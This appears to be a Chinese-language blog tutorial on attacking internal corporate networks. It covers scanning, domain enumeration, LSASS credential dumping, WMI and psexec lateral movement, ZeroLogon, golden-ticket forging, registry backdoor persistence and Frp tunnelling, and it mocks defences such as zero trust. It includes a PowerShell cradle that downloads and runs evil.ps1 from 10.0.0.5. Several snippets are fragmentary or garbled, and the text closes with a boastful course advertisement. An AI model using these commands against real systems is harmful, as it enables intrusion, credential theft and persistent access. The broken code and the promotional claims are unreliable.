内网安全?早就不是摆设了。谁还跟你玩传统的“进来看看”?现在是刺刀见红的巷战!数据泄露?年年创新高,背后都是内网被捅成了筛子。别扯什么“最新攻防技术”,直接上干货,教你从零开始,把内网搅个底朝天,也让防御方长点记性!
一、演兵场:别在真实环境瞎搞,先搭个窝
1.1 兵营蓝图
-
虚拟机,你的游乐场:VMware?VirtualBox?随便你。但配置要到位:
- 域控制器(Windows Server 2025):没这个,你玩个P的域渗透。
- 成员服务器(Windows 10/11):肉鸡预备役。
- 开发主机(Kali Linux 2025):你的瑞士军刀。
- 边界防火墙(pfSense):象征性的,别太当真。
-
网络拓扑?搞复杂点!:双网卡是标配。外网NAT,内网Host-Only,模拟真实企业环境?不,我们要模拟的是混乱!
1.2 我的军火库
装备 | 型号 | 主要用途 |
---|---|---|
情报收集 | P1soda、Nmap | 扫!给我把底裤都扫出来! |
破门而入 | Metasploit、Cobalt Strike | 炸!炸他个稀巴烂! |
乾坤大挪移 | Impacket、Mimikatz | 偷!把值钱的都偷走! |
地道战 | Frp、reGeorg | 钻!无孔不入! |
钉子户 | SharPersist、PowerSploit | 赖!死皮赖脸不走! |
警告:别TM乱搞!出了事别找我!只准在自己的地盘上用!
二、摸家底:内网藏宝图怎么画?
2.1 谁还活着?
P1soda?太慢!直接上Nmap,简单粗暴:
nmap -sn 192.168.1.0/24
什么?TTL值?那是给菜鸟看的。真正的黑客,直接看响应速度!
2.2 开了什么门?
Nmap再来一发,这次狠点:
nmap -sS -sV -p- -T5 --min-rate 1000 192.168.1.100
记住,端口就是入口,服务就是破绽!
- 445/SMB:永远的神!
- 5985/WinRM:远程RCE,想想就刺激!
- 6379/Redis:白给的漏洞,不要白不要!
2.3 谁是老大?
PowerShell?太low!直接LDAP:
ldapsearch -x -h 192.168.1.10 -D "cn=admin,dc=test,dc=com" -w "password" -b "dc=test,dc=com" "(objectClass=domain)" dn
域控IP?域管理员?组策略?统统给我挖出来!
三、以下克上:小兵也能干掉将军
3.1 找茬
Windows提权?老掉牙的玩意儿!
-
补丁?不存在的!:
systeminfo
?不如直接看KB编号。 -
EXP?安排!:Metasploit?太笨重!自己写!
```python
别当真,这只是个例子
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((‘10.0.0.5’, 4444))… 你的exploit代码 …
s.close()
``` -
上钩?等着收菜!:钓鱼邮件?漏洞上传?怎么脏怎么来!
3.2 扒光
Mimikatz?谁还用这玩意儿!直接读LSASS内存!
// 别当真,这只是个例子
#include <windows.h>
#include <stdio.h>
int main() {
HANDLE hProcess = OpenProcess(PROCESS_VM_READ, FALSE, processId);
ReadProcessMemory(hProcess, (void*)lsassBaseAddress, buffer, bufferSize, NULL);
// ... 解析内存数据 ...
CloseHandle(hProcess);
return 0;
}
NTLM Hash?Kerberos票据?都是我的!
四、狸猫换太子:在内网横着走
4.1 借刀杀人
Impacket?不错,但不够骚!自己写个WMI客户端!
# 别当真,这只是个例子
import wmi
c = wmi.WMI(computer='192.168.1.100', user='administrator', password='password')
process = c.Win32_Process.Create(CommandLine="cmd.exe /c whoami")
Credential Guard?呵呵,绕过它的方法多的是!
4.2 瞒天过海
WMI?太容易被发现了!换个姿势!
powershell -exec bypass -Command "& {Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http://10.0.0.5/evil.ps1')}"
不落地?无日志?EDR?不存在的!
4.3 斩首行动
-
ZeroLogon?必须拿下!:
```python
别当真,这只是个例子
import zerologon
zerologon.attack(‘192.168.1.10’, ‘DC01’)
``` -
票据?伪造!:
```bash
别当真,这只是个例子
./kekeo.exe “tgt::test.com/administrator@test.com:password”
./kekeo.exe “golden::test.com/administrator@test.com:S-1-5-21-123456789:krbtgt:hash”
``` -
域控?我的了!:
psexec.py administrator@DC01 cmd.exe
五、鸠占鹊巢:赖着不走
5.1 挖个坑
-
计划任务?太明显!:注册表启动项!
```powershell
别当真,这只是个例子
New-ItemProperty -Path “HKLM:SoftwareMicrosoftWindowsCurrentVersionRun” -Name “Evil” -Value “C:ackdoor.exe”
``` -
服务?伪装成驱动!:
```c
// 别当真,这只是个例子include
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
// … 你的后门代码 …
return TRUE;
}
```
5.2 打洞
隧道 | 工具 | 场景 |
---|---|---|
HTTP | reGeorg | Web服务器?那必须安排上! |
DNS | dnscat2 | 流量管控?照样穿透! |
ICMP | Ptunnel | 只允许Ping?那就Ping死你! |
多级代理 | Frp+CobaltStrike | 复杂网络?一层层剥开! |
# Frp服务端
[common]
bind_port = 7000
# Frp客户端
[common]
server_addr = 10.0.0.5
server_port = 7000
六、亡羊补牢?晚了!
6.1 零信任?呵呵
- 持续认证?骗鬼呢!:设备指纹?行为分析?都是可以伪造的!
- 微隔离?然并卵!:按业务划分?照样能穿透!
- 最小权限?呵呵!:JIT?延迟而已!
6.2 威胁狩猎?表演而已
- AI探针?呵呵!:基线建模?照样绕过!
- 蜜罐?呵呵!:虚假资产?一眼识破!
- 自动化响应?呵呵!:15秒?够我偷多少东西了!
七、免责声明
- 授权?必须的!:不然等着吃牢饭!
- 数据?别乱搞!:泄露了等着进去踩缝纫机!
- 工具?小心点!:用正规的,别给自己找麻烦!
- 报告?及时!:发现了漏洞赶紧报,别藏着掖着!
攻防?就是互相伤害!
内网渗透?就是黑客和安全工程师之间的猫鼠游戏。企业?多搞搞红蓝对抗,别光听厂商忽悠。记住:安全?是个无底洞,永远没有尽头!
网络安全系统学习资源推荐
网络安全作为数字时代的核心技术基石,已成为国家与企业发展的战略优先级。构建完整的安全能力体系,需从基础理论到实战对抗层层深化。以下为核心学习资源汇总:
- 网络安全完整学习路线图(覆盖全领域知识点);
- 20份渗透测试专业电子书;
- 357页安全攻防实战笔记;
- 50份安全攻防面试指南(含头部企业真题);
- 安全红队渗透工具包;
- 网络安全必读书籍清单;
- 100个漏洞实战案例解析;
- 安全大厂内部培训视频资源;
- 历年CTF夺旗赛题深度解析。
ps:网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我们和网安大厂360共同研发的网安视频教程,之前都是内部资源,专业方面绝对可以秒杀国内99%的机构和个人教学!全网独一份,你不可能在网上找到这么专业的教程。
内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频,200多G的资源,不用担心学不全。